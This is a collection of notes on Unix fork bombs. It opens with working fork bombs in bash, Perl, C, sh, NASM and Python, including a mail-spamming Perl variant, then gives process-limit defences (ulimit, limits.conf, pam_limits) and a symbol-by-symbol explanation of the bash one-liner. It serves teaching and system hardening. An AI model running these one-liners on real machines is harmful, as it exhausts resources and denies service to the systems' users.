bash fork bomb:
:(){ :|:& };:
perl fork bomb (forking via the Perl interpreter):
perl -e "fork while fork" &
c fork bomb:
#include <unistd.h>

int main(void) {
    while (1) {
        fork();
    }
    return 0;
}
c fork bomb (minimal one-liner, pre-C99 implicit int):
main() {for(;;)fork();}
sh fork bomb:
$0 & $0 &
nasm (compile: nasm -f elf bomb.asm ; ld -s -o bomb bomb.o):
;The ebx parameter isn't needed
;"jmp SHORT" shaves an extra 3 bytes off
;"mov al, 2" shaves off another 3 (registers are initially 0)
section .text ; text segment
global _start ; make _start global
_start: ; _start here
mov al, 2 ; fork: system call number 2
int 0x80 ; interrupt. (call the kernel)
jmp SHORT _start ; jump to _start
perl (mail-spamming variant):
while (1) { `echo "." | /usr/bin/mailx -s askme user@x.com`; fork(); }
python:
python -c 'while 1: __import__("os").fork()'
--------------------------------------------------------------------------------
ulimit -a  # show all current limits
One way to prevent a fork bomb is to limit the number of processes that a single
user may own. When a process tries to create another process and the owner of that
process already owns more than the maximum, the creation fails. The maximum should
be low enough that if all the users who might simultaneously bomb a system do,
there are still enough resources left to avoid disaster. Note that an accidental
fork bomb is highly unlikely to involve more than one user.
Unix-type systems typically have such a limit, controlled by a ulimit shell
command. With a Linux kernel, it is the RLIMIT_NPROC rlimit of a process: if a
process tries to fork and the user that owns it already owns RLIMIT_NPROC or
more processes, the fork fails with EAGAIN.
Note that simply limiting the number of processes a process may create does not
prevent a fork bomb, because each process the bomb creates goes on to create
processes of its own. A distributive resource allocation system, in which a
process's resources are a share of its parent's, would work, but distributive
resource systems are not in common use.
Another solution involves detection of fork bombs by the operating system;
this is not widely practiced, although it has been implemented as a kernel
module for the Linux kernel.
ulimit -u 20
ulimit -n 50
would allow the user to create at most 20 processes and open at most 50 files.
There are plenty of options; check man ulimit or the bash documentation. I
don't know all of them :/
Then, once you have made up your mind, put it in /etc/bashrc, after checking
who is logged in (if user != root, set limits). Have fun. :)
I can see that under Debian, Red Hat etc., where you have PAM, you can use
pam_limits, which will enforce these limits on all sessions, which is good.
Not sure about Linux, but on OpenBSD you can configure maxproc in login.conf
for whichever login class you want to restrict.
--------------------------------------------------------------------------------
Limiting user processes is one way to make sure that one user cannot
"commandeer" the system, making it unusable for others. To limit the processes
a user on your system can create, there are two files to edit:
/etc/limits
owned by the sys-apps/shadow package
/etc/security/limits.conf
owned by the sys-libs/pam package : this only affects programs
that use PAM, so the pam USE flag should be set.
/etc/limits
# This will limit all users to 40 processes max. This can be used to
# prevent a "fork bomb".
# Be warned, if the user logs into a Desktop Environment like GNOME or
# KDE, this could cause problems due to how many processes they launch.
* U 40
# Limit fred to logging in no more than twice. NOTE: This does not affect
# virtual terminals for some reason.
fred L 2
/etc/security/limits.conf
Most people prefer to edit this file because it's more readable and offers
more flexibility. This file can also enforce both hard and soft limits.
Soft limits can be exceeded, and will usually issue a warning of some kind.
Hard limits cannot. Also, unlike the other limits file, limits.conf can
match groups. To match a group, precede the group name with a "@".
# Prevents anyone from dumping core files.
* hard core 0
# This will prevent anyone in the 'users' group from having more than 150
# processes, and a warning will be given at 100 processes.
@users soft nproc 100
@users hard nproc 150
Then uncomment the following line in /etc/pam.d/login:
session required pam_limits.so
--------------------------------------------------------------------------------
bash fork bomb:
:(){ :|:& };:
It creates a function called ":" that accepts no arguments-- that's
the ":(){ ... }" part of the utterance.
The code in the function recursively calls the function
and pipes the output to another invocation of the function-- that's
the ":|:" part. The "&" puts the call into the background-- that way
the child processes don't die if the parent exits or is killed. Note
that by invoking the function twice, you get exponential growth in
the number of processes (nasty!).
The trailing ";" after the curly brace finishes the function definition
and the last ":" is the first invocation of the function that sets off
the bomb.
.   ()  {   .   |   .   &   }   ;   .
0   1   2   3   4   5   6   7   8   9
0 - function name of our newly defined function
1 - parentheses declare a function with no (here optional) arguments
2 - block begins
3 - call self, the newly defined function (recursive)
4 - open a pipe to another process
5 - call self, the newly defined function (recursive)
6 - fork! (put the whole thing in the background)
7 - block ends
8 - end complex statement [ function declaration ]
9 - run that function!